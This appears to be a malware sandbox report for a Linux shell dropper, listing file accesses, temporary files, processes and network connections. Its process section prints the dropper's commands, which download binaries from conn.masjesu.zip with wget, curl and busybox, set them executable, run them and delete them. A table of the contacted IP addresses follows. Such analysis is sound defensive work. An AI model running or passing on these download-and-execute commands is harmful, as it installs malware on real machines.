| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
